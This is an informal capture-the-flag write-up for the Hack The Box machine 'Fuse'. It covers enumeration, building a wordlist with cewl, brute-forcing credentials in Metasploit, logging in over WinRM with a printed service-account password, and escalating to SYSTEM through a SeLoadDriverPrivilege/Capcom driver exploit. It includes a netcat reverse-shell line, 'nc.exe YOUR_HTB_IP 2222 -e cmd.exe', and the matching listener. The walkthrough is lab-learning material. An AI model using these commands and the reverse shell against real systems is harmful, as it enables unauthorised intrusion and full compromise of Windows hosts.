Enumeration:
Lets start with whats open on the box and what we can exploit. A quick nmap scan gives us:
nmap -T4 -p- -A 10.10.10.193
Holly Fu@k so many ports. I usually start with port 80. By going to the webpage I noticed that the URL is wired, so i decided to add it to the /etc/hosts.
Ok so now we have a website. I started browsing around and hoping I can use something. Then I start seeing some users that have used the specific printer.
I made a list of all users. You can check it bellow:
pmerton, tlavel, sthompson, bhult, administrator
Well time to collect some passwords because now we have bunch of users and 0 passwords. I method that was recommended to me was to use cewl
cewl -d 5 -m 3 -w pass.lst http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbersTime to see if that list with this passwords will mount some of the SMB shares. For this purpose I would use smb_login from metasploit. Here you need to set RHOST, user_file (the user that are mentioned above) and pass_file (the file we generated with cewl.
Two potential entry points were found:
After trying to login with both well …. that failed.
What we can do is to try to change the password. Follow the command. My my password is the same just instead of 01 i put 02.
After changing the password we can use rpcclient to login and enumerate a bit more.
Save all the new users in the user.list file that we made earlier. Lets check for printers.
USER:
Holly shit here we go we got one password. It does not say for which user but we can use this password with the updated user list with metasploit we can try to figure that out. The metasploit module that we are going to use is: winrm_login.
And we have a result:
[+] 10.10.10.193:5985 - Login Successful: WORKSTATION\svc-print:$fab@s3Rv1ce$1
Please follow the instructions and get evil-winrm. Here is the link:
https://github.com/Hackplayers/evil-winrm
After some directory traversing I managed to find the user flag.
ROOT:
Now lets start enumerating for root. Here are two quick commands:
whoami
whoami /all
To be able to get root I would suggest to take a good look at following links:
https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
The needed CPP files: File1 and File2
You need to compile the files. After that what needs to be done is to tranfer the files in C:\temp> Take a look at the picture bellow and you will see which files you need to have in this folder.
The content of netcat.bat is:
c:\temp\nc.exe YOUR_HTB_IP 2222 -e cmd.exeAfter you have transferred all the files from your local machine to FUSE run the following commands on FUSE in the temp folder.
.\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\capcom.sys.\ExploitCapcom_modded.exeMeanwhile you need to have a listener up on your local machine. I use rlwrap. If you don’t have it installed you can read HERE.
rlwrap nc -nvlp 2222
The port in the command above should be the same as the port in netcat.bat
I hope you enjoyed the write up. I am not so good on windows boxes so may be the root part is a bit chaotic.
